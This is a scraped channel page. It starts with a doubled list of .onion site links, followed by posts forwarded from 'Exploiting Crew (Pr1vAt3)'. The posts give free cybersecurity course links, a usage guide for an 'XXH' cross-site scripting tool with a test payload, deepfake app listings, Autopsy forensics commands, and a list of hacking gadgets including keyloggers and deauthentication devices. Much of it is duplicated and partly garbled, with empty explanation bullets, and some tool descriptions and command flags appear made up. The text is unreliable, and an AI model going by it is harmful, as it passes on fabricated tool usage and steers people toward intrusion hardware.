https://kcmykvkkt3umiyx4xouu3sjo6odz3rolqphy2i2bbdan33g3zrjfjgqd.onion/ β aboutMastodon
http://dhosting4xxoydyaivckq7tsmtgi4wfs3flpeyitekkmqwu4v4r46syd.onion/ β Daniels Hosting
http://cathug2kyi4ilneggumrenayhuhsvrgn6qv2y47bgeet42iivkpynqad.onion/ β cathuggerβs site
http://zgeajoabenj2nac6k5cei5qy62iu5yun5gm2vjnxy65r3p3amzykwxqd.onion/ β Darkweb Blog
http://ozmh2zkwx5cjuzopui64csb5ertcooi5vya6c2gm4e3vcvf2c2qvjiyd.onion/ β riseup searx
http://45tbhx5prlejzjgn36nqaxqb6qnm73pbohuvqkpxz2zowh57bxqawkid.onion/ β Parckwartβs Website
http://sidignlwz2odjhgcfhbueinmr23v5bubq2x43dskcebh5sbd2qrxtkid.onion/ β securejabber
http://sik5nlgfc5qylnnsr57qrbm64zbdx6t4lreyhpon3ychmxmiem7tioad.onion/ β Qubes OS
http://dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion/ β Whonix
http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion/ β OnionShare
http://nanochanqzaytwlydykbg5nxkgyjxk3zsrctxuoxdmbx5jbh2ydyprid.onion/ β NanoChan
http://picochanwvqfa2xsrfzlul4x4aqtog2eljll5qnj5iagpbhx2vmfqnid.onion/ β PicoChan
http://enxx3byspwsdo446jujc52ucy2pf5urdbhqw3kbsfhlfjwmbpj5smdad.onion/ β EndChan
http://dngtk6iydmpokbyyk3irqznceft3hze6q6rasrqlz46v7pq4klxnl4yd.onion/ β 256Chan
http://cct5wy6mzgmft24xzw6zeaf55aaqmo6324gjlsghdhbiw5gdaaf4pkad.onion/ β Snopyta
http://wnrgozz3bmm33em4aln3lrbewf3ikxj7fwglqgla2tpdji4znjp7viqd.onion/ β VYempire.xyz
http://7sk2kov2xwx6cbc32phynrifegg6pklmzs7luwcggtzrnlsolxxuyfyd.onion/ β SystemLI.org
http://stormwayszuh4juycoy4kwoww5gvcu2c4tdtpkup667pdwe4qenzwayd.onion/ β CryptoStorm VPN
http://xdkriz6cn2avvcr2vks5lvvtmfojz2ohjzj4fhyuka55mvljeso2ztqd.onion/ β Cock.li
http://eludemailxhnqzfmxehy3bk5guyhlxbunfyhkcksv4gvx6d3wcf6smad.onion/ β Elude.in
http://lainwir3s4y5r7mqm3kurzpljyf77vty2hrrfkps6wm4nnnqzest4lqd.onion/ β qord11.net
http://cgjzkysxa4ru5rhrtr6rafckhexbisbtxwg2fg743cjumioysmirhdad.onion/ β Course Enigma
http://killnod2s77o3axkktdu52aqmmy4acisz2gicbhjm4xbvxa2zfftteyd.onion/ β Kill9
http://digdeep4orxw6psc33yxa2dgmuycj74zi6334xhxjlgppw6odvkzkiad.onion/ β DigDeeper
http://spywaredrcdg5krvjnukp3vbdwiqcv3zwbrcg6qh27kiwecm4qyfphid.onion/ β Spyware Watchdog
http://meynethaffeecapsvfphrcnfrx44w2nskgls2juwitibvqctk2plvhqd.onion/ β May Vane Day Studios
http://zsxjtsgzborzdllyp64c6pwnjz5eic76bsksbxzqefzogwcydnkjy3yd.onion/ β Shadow Wiki
http://g7ejphhubv5idbbu3hb3wawrs5adw7tkx7yjabnf65xtzztgg4hcsqqd.onion/ β Defcon
http://p53lf57qovyuvwsc6xnrppyply3vtqm7l6pcobkmyqsiofyeznfu5uqd.onion/ β Propublica
http://darkzzx4avcsuofgfez5zq75cqc4mprjvfqywo45dfcaxrwqg6qrlfid.onion/ β Darknetlive
http://keybase5wmilwokqirssclfnsqrjdsi7jdir5wy7y7iu3tanwmtp6oid.onion/ β KeyBase.IO
http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion/ β CIA.GOV
http://archivebyd3rzt3ehjpm4c3bjkyxv3hjleiytnvxcn7x32psn2kxcuid.onion/ β Internet Archive
http://bible4u2lvhacg4b3to2e2veqpwmrc2c3tjf2wuuqiz332vlwmr4xbad.onion/ β Bible4u
http://kx5thpx2olielkihfyo4jgjqfb7zx7wxr3sd4xzt26ochei4m6f7tayd.onion/ β Imperial Library
http://nv3x2jozywh63fkohn5mwp2d73vasusjixn3im3ueof52fmbjsigw6ad.onion/ β Comic Books
http://danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion/ β DanielWin
http://answerszuvs3gg2l64e6hmnryudl5zgrmwm3vh65hzszdghblddvfiqd.onion/ β Hidden Answers
https://kcmykvkkt3umiyx4xouu3sjo6odz3rolqphy2i2bbdan33g3zrjfjgqd.onion/ β aboutMastodon
http://dhosting4xxoydyaivckq7tsmtgi4wfs3flpeyitekkmqwu4v4r46syd.onion/ β Daniels Hosting
http://cathug2kyi4ilneggumrenayhuhsvrgn6qv2y47bgeet42iivkpynqad.onion/ β cathuggerβs site
http://zgeajoabenj2nac6k5cei5qy62iu5yun5gm2vjnxy65r3p3amzykwxqd.onion/ β Darkweb Blog
http://ozmh2zkwx5cjuzopui64csb5ertcooi5vya6c2gm4e3vcvf2c2qvjiyd.onion/ β riseup searx
http://45tbhx5prlejzjgn36nqaxqb6qnm73pbohuvqkpxz2zowh57bxqawkid.onion/ β Parckwartβs Website
http://sidignlwz2odjhgcfhbueinmr23v5bubq2x43dskcebh5sbd2qrxtkid.onion/ β securejabber
http://sik5nlgfc5qylnnsr57qrbm64zbdx6t4lreyhpon3ychmxmiem7tioad.onion/ β Qubes OS
http://dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion/ β Whonix
http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion/ β OnionShare
http://nanochanqzaytwlydykbg5nxkgyjxk3zsrctxuoxdmbx5jbh2ydyprid.onion/ β NanoChan
http://picochanwvqfa2xsrfzlul4x4aqtog2eljll5qnj5iagpbhx2vmfqnid.onion/ β PicoChan
http://enxx3byspwsdo446jujc52ucy2pf5urdbhqw3kbsfhlfjwmbpj5smdad.onion/ β EndChan
http://dngtk6iydmpokbyyk3irqznceft3hze6q6rasrqlz46v7pq4klxnl4yd.onion/ β 256Chan
http://cct5wy6mzgmft24xzw6zeaf55aaqmo6324gjlsghdhbiw5gdaaf4pkad.onion/ β Snopyta
http://wnrgozz3bmm33em4aln3lrbewf3ikxj7fwglqgla2tpdji4znjp7viqd.onion/ β VYempire.xyz
http://7sk2kov2xwx6cbc32phynrifegg6pklmzs7luwcggtzrnlsolxxuyfyd.onion/ β SystemLI.org
http://stormwayszuh4juycoy4kwoww5gvcu2c4tdtpkup667pdwe4qenzwayd.onion/ β CryptoStorm VPN
http://xdkriz6cn2avvcr2vks5lvvtmfojz2ohjzj4fhyuka55mvljeso2ztqd.onion/ β Cock.li
http://eludemailxhnqzfmxehy3bk5guyhlxbunfyhkcksv4gvx6d3wcf6smad.onion/ β Elude.in
http://lainwir3s4y5r7mqm3kurzpljyf77vty2hrrfkps6wm4nnnqzest4lqd.onion/ β qord11.net
http://cgjzkysxa4ru5rhrtr6rafckhexbisbtxwg2fg743cjumioysmirhdad.onion/ β Course Enigma
http://killnod2s77o3axkktdu52aqmmy4acisz2gicbhjm4xbvxa2zfftteyd.onion/ β Kill9
http://digdeep4orxw6psc33yxa2dgmuycj74zi6334xhxjlgppw6odvkzkiad.onion/ β DigDeeper
http://spywaredrcdg5krvjnukp3vbdwiqcv3zwbrcg6qh27kiwecm4qyfphid.onion/ β Spyware Watchdog
http://meynethaffeecapsvfphrcnfrx44w2nskgls2juwitibvqctk2plvhqd.onion/ β May Vane Day Studios
http://zsxjtsgzborzdllyp64c6pwnjz5eic76bsksbxzqefzogwcydnkjy3yd.onion/ β Shadow Wiki
http://g7ejphhubv5idbbu3hb3wawrs5adw7tkx7yjabnf65xtzztgg4hcsqqd.onion/ β Defcon
http://p53lf57qovyuvwsc6xnrppyply3vtqm7l6pcobkmyqsiofyeznfu5uqd.onion/ β Propublica
http://darkzzx4avcsuofgfez5zq75cqc4mprjvfqywo45dfcaxrwqg6qrlfid.onion/ β Darknetlive
http://keybase5wmilwokqirssclfnsqrjdsi7jdir5wy7y7iu3tanwmtp6oid.onion/ β KeyBase.IO
http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion/ β CIA.GOV
http://archivebyd3rzt3ehjpm4c3bjkyxv3hjleiytnvxcn7x32psn2kxcuid.onion/ β Internet Archive
http://bible4u2lvhacg4b3to2e2veqpwmrc2c3tjf2wuuqiz332vlwmr4xbad.onion/ β Bible4u
http://kx5thpx2olielkihfyo4jgjqfb7zx7wxr3sd4xzt26ochei4m6f7tayd.onion/ β Imperial Library
http://nv3x2jozywh63fkohn5mwp2d73vasusjixn3im3ueof52fmbjsigw6ad.onion/ β Comic Books
Forwarded from Exploiting Crew (Pr1vAt3)
π© If you want to learn CYBERSECURITY for FREE, this THREAD is for you.
πHere are Loads of FREE RESOURCES (Courses, Certifications, Communities, Internship opportunities) to get you STARTED.
πππ
If you want to learn CYBERSECURITY for FREE, this THREAD is for you.
πHere are Loads of FREE RESOURCES (Courses, Certifications, Communities, Internship opportunities) to get you STARTED.
1. Cisco CCNA Cyber Ops Associate 200-201 - MEGA
πmega.nz/folder/B4A0WDZβ¦
2. Cybersecurity FULLY LOADED by Simplilearn
πhttps://lnkd.in/eddq3rXW
3. Cybersecurity FULL course by EDUREKA
πhttps://lnkd.in/eK_dZFUi
4. Awesome Cybersecurity University
πhttps://lnkd.in/er-MAK2q
5. Cybersecurity books for beginners
πhttps://lnkd.in/ecBzr_Sn
6. Cybersecurity Documents
πhttps://lnkd.in/ecBzr_Sn
Cyber Security Courses for beginners and professionals
π Core:
Cisco Network Essentials - lnkd.in/eMXxFBPN
Palo Alto - lnkd.in/ebz4VZmQ
AWS Cloud - lnkd.in/e_auX7VE
Azure Cloud - lnkd.in/eCq_dvDq
GCP Cloud - lnkd.in/eDNWnVsD
π Fundamentals:
SANS Aces - lnkd.in/eNCPrtdd
ISC(2) Certified in Cyber - lnkd.in/e6jB_6af
Coursera - lnkd.in/ePMNVDm5
EC-Council - lnkd.in/ewiVUkYt
Cyber Security - lnkd.in/eueCSF6A
Cisco Cyber Induction - lnkd.in/e8C3jacc
Cisco Cyber Essentials - lnkd.in/eTQNsbyF
Cisco Network Essentials - lnkd.in/eMXxFBPN
Palo Alto - lnkd.in/ebz4VZmQ
Fortinet NSE - lnkd.in/es3c_Q6E
π Penetration Testing:
TCM-Security - lnkd.in/eJQKmhnt
PortSwigger Web Hacking - lnkd.in/eEa-fNfu
CodeRed Hacking Essentials - lnkd.in/eJbyZp_9
RedTeaming - lnkd.in/et_T2DEa
METASPLOIT UNLEASHED - lnkd.in/eJFcNSsz
Hacker101 - lnkd.in/eJK5xp2A
π Vulnerability Management:
Qualys - lnkd.in/eDWu2zyT
Tenable (Intro) - lnkd.in/eQW2Zjjj
Class Central - lnkd.in/eWbmXfRU
π SIEM:
Splunk - lnkd.in/e5ZVAEuF
QRadar - lnkd.in/ebjbyq_x
Elastic - lnkd.in/e-jXsnVs
XPERT - lnkd.in/eYR7r3uD
π Engineering:
Oxford - lnkd.in/eJHp7Dp2
IoT Privacy - lnkd.in/eN5xDUed
πHere are Loads of FREE RESOURCES (Courses, Certifications, Communities, Internship opportunities) to get you STARTED.
πππ
If you want to learn CYBERSECURITY for FREE, this THREAD is for you.
πHere are Loads of FREE RESOURCES (Courses, Certifications, Communities, Internship opportunities) to get you STARTED.
1. Cisco CCNA Cyber Ops Associate 200-201 - MEGA
πmega.nz/folder/B4A0WDZβ¦
2. Cybersecurity FULLY LOADED by Simplilearn
πhttps://lnkd.in/eddq3rXW
3. Cybersecurity FULL course by EDUREKA
πhttps://lnkd.in/eK_dZFUi
4. Awesome Cybersecurity University
πhttps://lnkd.in/er-MAK2q
5. Cybersecurity books for beginners
πhttps://lnkd.in/ecBzr_Sn
6. Cybersecurity Documents
πhttps://lnkd.in/ecBzr_Sn
Cyber Security Courses for beginners and professionals
π Core:
Cisco Network Essentials - lnkd.in/eMXxFBPN
Palo Alto - lnkd.in/ebz4VZmQ
AWS Cloud - lnkd.in/e_auX7VE
Azure Cloud - lnkd.in/eCq_dvDq
GCP Cloud - lnkd.in/eDNWnVsD
π Fundamentals:
SANS Aces - lnkd.in/eNCPrtdd
ISC(2) Certified in Cyber - lnkd.in/e6jB_6af
Coursera - lnkd.in/ePMNVDm5
EC-Council - lnkd.in/ewiVUkYt
Cyber Security - lnkd.in/eueCSF6A
Cisco Cyber Induction - lnkd.in/e8C3jacc
Cisco Cyber Essentials - lnkd.in/eTQNsbyF
Cisco Network Essentials - lnkd.in/eMXxFBPN
Palo Alto - lnkd.in/ebz4VZmQ
Fortinet NSE - lnkd.in/es3c_Q6E
π Penetration Testing:
TCM-Security - lnkd.in/eJQKmhnt
PortSwigger Web Hacking - lnkd.in/eEa-fNfu
CodeRed Hacking Essentials - lnkd.in/eJbyZp_9
RedTeaming - lnkd.in/et_T2DEa
METASPLOIT UNLEASHED - lnkd.in/eJFcNSsz
Hacker101 - lnkd.in/eJK5xp2A
π Vulnerability Management:
Qualys - lnkd.in/eDWu2zyT
Tenable (Intro) - lnkd.in/eQW2Zjjj
Class Central - lnkd.in/eWbmXfRU
π SIEM:
Splunk - lnkd.in/e5ZVAEuF
QRadar - lnkd.in/ebjbyq_x
Elastic - lnkd.in/e-jXsnVs
XPERT - lnkd.in/eYR7r3uD
π Engineering:
Oxford - lnkd.in/eJHp7Dp2
IoT Privacy - lnkd.in/eN5xDUed
mega.nz
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
π¦ XXH - Cross-Site Hacking (XXH)
XXH is a tool used for exploiting vulnerabilities in cross-site scripting (XSS) attacks in web applications. It can be used to automate attacks and demonstrate how an attacker can inject malicious scripts into a website.
### Basic Usage Command:
Explanation:
-
-
---
### Example: Test for Specific XSS Payloads
Explanation:
-
-
---
### Important Notes:
1. Authorization: Always ensure you have explicit permission to test a website for XSS vulnerabilities, as unauthorized testing is illegal.
2. Payloads: XXH can help automate the process of injecting a variety of XSS payloads into vulnerable parameters in web applications.
3. Testing: This tool is best used to identify and demonstrate XSS vulnerabilities, which could allow an attacker to steal sensitive data like cookies, session IDs, or other information.
XXH is a tool used for exploiting vulnerabilities in cross-site scripting (XSS) attacks in web applications. It can be used to automate attacks and demonstrate how an attacker can inject malicious scripts into a website.
### Basic Usage Command:
xxh -u http://example.com
Explanation:
-
xxh: Runs the XXH tool.-
-u http://example.com: Specifies the target URL to test for XSS vulnerabilities.---
### Example: Test for Specific XSS Payloads
xxh -u http://example.com -p "<script>alert('XSS')</script>"Explanation:
-
-u http://example.com: Specifies the target URL.-
-p "<script>alert('XSS')</script>": Provides a specific payload to test the application for a potential XSS vulnerability.---
### Important Notes:
1. Authorization: Always ensure you have explicit permission to test a website for XSS vulnerabilities, as unauthorized testing is illegal.
2. Payloads: XXH can help automate the process of injecting a variety of XSS payloads into vulnerable parameters in web applications.
3. Testing: This tool is best used to identify and demonstrate XSS vulnerabilities, which could allow an attacker to steal sensitive data like cookies, session IDs, or other information.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦Top Free DeepFake Labs:
1. DeepFaceLab
- Overview: One of the most popular open-source deepfake tools, DeepFaceLab allows you to create high-quality deepfake videos, but it requires significant technical skills.
- Features: High level of customization, support for face-swapping, training, and exporting videos.
- Platform: Windows (requires installation).
- Cost: Free (but with a steep learning curve).
[DeepFaceLab GitHub](https://github.com/iperov/DeepFaceLab)
2. FaceSwap
- Overview: Another open-source deepfake tool, FaceSwap offers similar capabilities to DeepFaceLab, with a slightly easier user interface.
- Features: Face swapping, training models, video creation, and a large community for troubleshooting.
- Platform: Windows, Linux, macOS.
- Cost: Free.
[FaceSwap GitHub](https://github.com/deepfakes/faceswap)
3. Zao
- Overview: Zao is a popular deepfake app that lets users swap faces in short video clips. It's quite easy to use and doesn't require any technical expertise.
- Features: Instant face swapping in videos, easy-to-use mobile app.
- Platform: iOS, Android.
- Cost: Free (though there might be in-app purchases or ads).
[Zao on App Store](https://apps.apple.com/us/app/zao/id1468717386)
4. Reface (formerly Doublicat)
- Overview: Reface is a mobile app that allows users to swap faces in GIFs, images, and videos. It provides high-quality face-swapping, making it popular for meme creation.
- Features: Instant face swap in videos, GIFs, and photos.
- Platform: iOS, Android.
- Cost: Free, with a premium version offering additional features.
[Reface on App Store](https://apps.apple.com/us/app/reface/id1480262143)
[Reface on Google Play](https://play.google.com/store/apps/details?id=com.reface.app)
5. DeepArt.io
- Overview: While not specifically for deepfakes, DeepArt.io allows users to transform their photos into stylized artworks using AI. Some users have experimented with face-swapping features.
- Features: AI-based art transformation, face-swapping capabilities.
- Platform: Web.
- Cost: Free for basic features.
[DeepArt.io](https://deepart.io/)
6. FaceApp
- Overview: A very popular app for aging, gender-swapping, and face enhancement. While not a traditional deepfake tool, it leverages AI for impressive transformations of faces in photos.
- Features: Aging, gender swap, facial expressions, makeup, and more.
- Platform: iOS, Android.
- Cost: Free with in-app purchases.
[FaceApp on App Store](https://apps.apple.com/us/app/faceapp/id1180881432)
[FaceApp on Google Play](https://play.google.com/store/apps/details?id=io.faceapp&hl=en&gl=US)
7. MyHeritage Deep Nostalgia
- Overview: A fun tool that animates old photos, bringing them to life by making them appear as if they're moving. It uses deepfake-like technology but focuses on historic photos.
- Features: Animation of photos (facial expressions and movements).
- Platform: Web, iOS, Android.
- Cost: Free trial, but the full functionality may require a subscription.
[MyHeritage Deep Nostalgia](https://www.myheritage.com/deep-nostalgia)
8. Fotor (Deepfake Filters)
- Overview: Fotor offers AI-powered editing tools, including face swapping and other deepfake-style effects, allowing users to alter facial features in photos.
- Features: Face-swapping filters, AI-generated photo enhancements.
- Platform: Web, iOS, Android.
- Cost: Free with premium options.
[Fotor](https://www.fotor.com/)
Important Considerations:
- Ethical Use: Always be cautious when using deepfake tools, as they can be used for harmful purposes such as misinformation, identity theft, or defamation.
- Legal Restrictions: In many regions, the creation and distribution of deepfakes, particularly without consent, may be illegal or lead to legal repercussions.
These websites and apps offer free tools for experimenting with AI-based face manipulation, but they each come with limitations in functionality and output quality.
1. DeepFaceLab
- Overview: One of the most popular open-source deepfake tools, DeepFaceLab allows you to create high-quality deepfake videos, but it requires significant technical skills.
- Features: High level of customization, support for face-swapping, training, and exporting videos.
- Platform: Windows (requires installation).
- Cost: Free (but with a steep learning curve).
[DeepFaceLab GitHub](https://github.com/iperov/DeepFaceLab)
2. FaceSwap
- Overview: Another open-source deepfake tool, FaceSwap offers similar capabilities to DeepFaceLab, with a slightly easier user interface.
- Features: Face swapping, training models, video creation, and a large community for troubleshooting.
- Platform: Windows, Linux, macOS.
- Cost: Free.
[FaceSwap GitHub](https://github.com/deepfakes/faceswap)
3. Zao
- Overview: Zao is a popular deepfake app that lets users swap faces in short video clips. It's quite easy to use and doesn't require any technical expertise.
- Features: Instant face swapping in videos, easy-to-use mobile app.
- Platform: iOS, Android.
- Cost: Free (though there might be in-app purchases or ads).
[Zao on App Store](https://apps.apple.com/us/app/zao/id1468717386)
4. Reface (formerly Doublicat)
- Overview: Reface is a mobile app that allows users to swap faces in GIFs, images, and videos. It provides high-quality face-swapping, making it popular for meme creation.
- Features: Instant face swap in videos, GIFs, and photos.
- Platform: iOS, Android.
- Cost: Free, with a premium version offering additional features.
[Reface on App Store](https://apps.apple.com/us/app/reface/id1480262143)
[Reface on Google Play](https://play.google.com/store/apps/details?id=com.reface.app)
5. DeepArt.io
- Overview: While not specifically for deepfakes, DeepArt.io allows users to transform their photos into stylized artworks using AI. Some users have experimented with face-swapping features.
- Features: AI-based art transformation, face-swapping capabilities.
- Platform: Web.
- Cost: Free for basic features.
[DeepArt.io](https://deepart.io/)
6. FaceApp
- Overview: A very popular app for aging, gender-swapping, and face enhancement. While not a traditional deepfake tool, it leverages AI for impressive transformations of faces in photos.
- Features: Aging, gender swap, facial expressions, makeup, and more.
- Platform: iOS, Android.
- Cost: Free with in-app purchases.
[FaceApp on App Store](https://apps.apple.com/us/app/faceapp/id1180881432)
[FaceApp on Google Play](https://play.google.com/store/apps/details?id=io.faceapp&hl=en&gl=US)
7. MyHeritage Deep Nostalgia
- Overview: A fun tool that animates old photos, bringing them to life by making them appear as if they're moving. It uses deepfake-like technology but focuses on historic photos.
- Features: Animation of photos (facial expressions and movements).
- Platform: Web, iOS, Android.
- Cost: Free trial, but the full functionality may require a subscription.
[MyHeritage Deep Nostalgia](https://www.myheritage.com/deep-nostalgia)
8. Fotor (Deepfake Filters)
- Overview: Fotor offers AI-powered editing tools, including face swapping and other deepfake-style effects, allowing users to alter facial features in photos.
- Features: Face-swapping filters, AI-generated photo enhancements.
- Platform: Web, iOS, Android.
- Cost: Free with premium options.
[Fotor](https://www.fotor.com/)
Important Considerations:
- Ethical Use: Always be cautious when using deepfake tools, as they can be used for harmful purposes such as misinformation, identity theft, or defamation.
- Legal Restrictions: In many regions, the creation and distribution of deepfakes, particularly without consent, may be illegal or lead to legal repercussions.
These websites and apps offer free tools for experimenting with AI-based face manipulation, but they each come with limitations in functionality and output quality.
GitHub
GitHub - iperov/DeepFaceLab: DeepFaceLab is the leading software for creating deepfakes.
DeepFaceLab is the leading software for creating deepfakes. - iperov/DeepFaceLab
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Autopsy - Digital Forensics Platform
Autopsy is an open-source digital forensics platform used for analyzing hard drives, smartphones, and other digital storage devices. It provides a user-friendly interface for examining file systems, extracting evidence, and generating forensic reports, making it a valuable tool for investigating cybercrimes and incidents.
---
### Basic Usage Command:
To start Autopsy from the command line:
Explanation:
-
---
### Example: Create a New Case
Explanation:
-
-
---
### Example: Analyze File System and Evidence
Once the case is created, you can use Autopsy to analyze file systems, perform keyword searches, recover deleted files, and generate reports through its GUI. However, you can also perform some basic tasks like viewing the file structure or checking logs from the command line interface (CLI).
---
### Important Notes:
1. Case Handling: Autopsy can be used to handle multiple cases simultaneously, making it efficient for forensic investigations with large amounts of evidence.
2. Extensive Plugin Support: Autopsy supports a wide range of plugins that allow integration with other tools like Sleuth Kit (TSK), a popular set of command-line forensic tools.
3. Legal Considerations: Always make sure you have permission to perform forensic analysis, as unauthorized analysis of digital devices may be illegal.
Autopsy is an open-source digital forensics platform used for analyzing hard drives, smartphones, and other digital storage devices. It provides a user-friendly interface for examining file systems, extracting evidence, and generating forensic reports, making it a valuable tool for investigating cybercrimes and incidents.
---
### Basic Usage Command:
To start Autopsy from the command line:
autopsy
Explanation:
-
autopsy: Launches the Autopsy graphical user interface (GUI) for forensic analysis.---
### Example: Create a New Case
autopsy -c new_case -d /path/to/image.dd
Explanation:
-
-c new_case: Creates a new forensic case.-
-d /path/to/image.dd: Specifies the disk image to analyze, which could be a raw disk image, an E01 file, or other supported formats.---
### Example: Analyze File System and Evidence
Once the case is created, you can use Autopsy to analyze file systems, perform keyword searches, recover deleted files, and generate reports through its GUI. However, you can also perform some basic tasks like viewing the file structure or checking logs from the command line interface (CLI).
---
### Important Notes:
1. Case Handling: Autopsy can be used to handle multiple cases simultaneously, making it efficient for forensic investigations with large amounts of evidence.
2. Extensive Plugin Support: Autopsy supports a wide range of plugins that allow integration with other tools like Sleuth Kit (TSK), a popular set of command-line forensic tools.
3. Legal Considerations: Always make sure you have permission to perform forensic analysis, as unauthorized analysis of digital devices may be illegal.
Forwarded from Exploiting Crew (Pr1vAt3)
π¦ Top Hacking gadgets frequently used by cybersecurity professionals, ethical hackers, and enthusiasts, along with their official or well-known sources:
1. Raspberry Pi - A versatile single-board computer used for penetration testing and running tools like Kali Linux.
URL: [www.raspberrypi.com](https://www.raspberrypi.com)
2. WiFi Pineapple - A device for wireless penetration testing, including rogue access points and deauth tests.
URL: [shop.hak5.org](https://shop.hak5.org)
3. HackRF One - A software-defined radio for analyzing and manipulating radio frequencies.
URL: [greatscottgadgets.com](https://greatscottgadgets.com)
4. Ubertooth One - Used for Bluetooth experimentation and packet sniffing.
URL: [greatscottgadgets.com](https://greatscottgadgets.com)
5. Deauther Watch - A wearable device for Wi-Fi deauthentication attacks.
URL: [dstike.com](https://dstike.com)
6. USB Rubber Ducky - A keystroke injection tool that executes predefined attack scripts.
URL: [shop.hak5.org](https://shop.hak5.org)
7. Flipper Zero - A multi-tool for interacting with digital systems like RFID and GPIO debugging.
URL: [flipperzero.one](https://flipperzero.one)
8. ChameleonMini - An RFID emulator for NFC security analysis and penetration testing.
URL: [chameleontiny.com](https://chameleontiny.com)
9. O.MG Cable - A USB cable capable of injecting payloads and acting as a keylogger.
URL: [shop.hak5.org](https://shop.hak5.org)
10. HakCat WiFi Nugget - A tool for learning Wi-Fi hacking with a playful design.
URL: [github.com/HakCat](https://github.com/HakCat)
11. Hardware Keylogger - A physical device for recording keystrokes.
URL: [keydemon.com](https://keydemon.com)
12. LAN Turtle - A covert hacking tool disguised as a USB-to-Ethernet adapter.
URL: [shop.hak5.org](https://shop.hak5.org)
13. Proxmark3 - Used for RFID research, cloning, and penetration testing.
URL: [proxmark.org](https://proxmark.org)
14. Rubber Glove (Covert Device) - A disguised tool for capturing sensitive information.
URL: Search online for specific retailers.
Let me know if you'd like an6 extended list or details about a specific gadget!
1. Raspberry Pi - A versatile single-board computer used for penetration testing and running tools like Kali Linux.
URL: [www.raspberrypi.com](https://www.raspberrypi.com)
2. WiFi Pineapple - A device for wireless penetration testing, including rogue access points and deauth tests.
URL: [shop.hak5.org](https://shop.hak5.org)
3. HackRF One - A software-defined radio for analyzing and manipulating radio frequencies.
URL: [greatscottgadgets.com](https://greatscottgadgets.com)
4. Ubertooth One - Used for Bluetooth experimentation and packet sniffing.
URL: [greatscottgadgets.com](https://greatscottgadgets.com)
5. Deauther Watch - A wearable device for Wi-Fi deauthentication attacks.
URL: [dstike.com](https://dstike.com)
6. USB Rubber Ducky - A keystroke injection tool that executes predefined attack scripts.
URL: [shop.hak5.org](https://shop.hak5.org)
7. Flipper Zero - A multi-tool for interacting with digital systems like RFID and GPIO debugging.
URL: [flipperzero.one](https://flipperzero.one)
8. ChameleonMini - An RFID emulator for NFC security analysis and penetration testing.
URL: [chameleontiny.com](https://chameleontiny.com)
9. O.MG Cable - A USB cable capable of injecting payloads and acting as a keylogger.
URL: [shop.hak5.org](https://shop.hak5.org)
10. HakCat WiFi Nugget - A tool for learning Wi-Fi hacking with a playful design.
URL: [github.com/HakCat](https://github.com/HakCat)
11. Hardware Keylogger - A physical device for recording keystrokes.
URL: [keydemon.com](https://keydemon.com)
12. LAN Turtle - A covert hacking tool disguised as a USB-to-Ethernet adapter.
URL: [shop.hak5.org](https://shop.hak5.org)
13. Proxmark3 - Used for RFID research, cloning, and penetration testing.
URL: [proxmark.org](https://proxmark.org)
14. Rubber Glove (Covert Device) - A disguised tool for capturing sensitive information.
URL: Search online for specific retailers.
Let me know if you'd like an6 extended list or details about a specific gadget!
Raspberry Pi
From industries large and small, to the kitchen table tinkerer, to the classroom coder, we make computing accessible and affordable for everybody.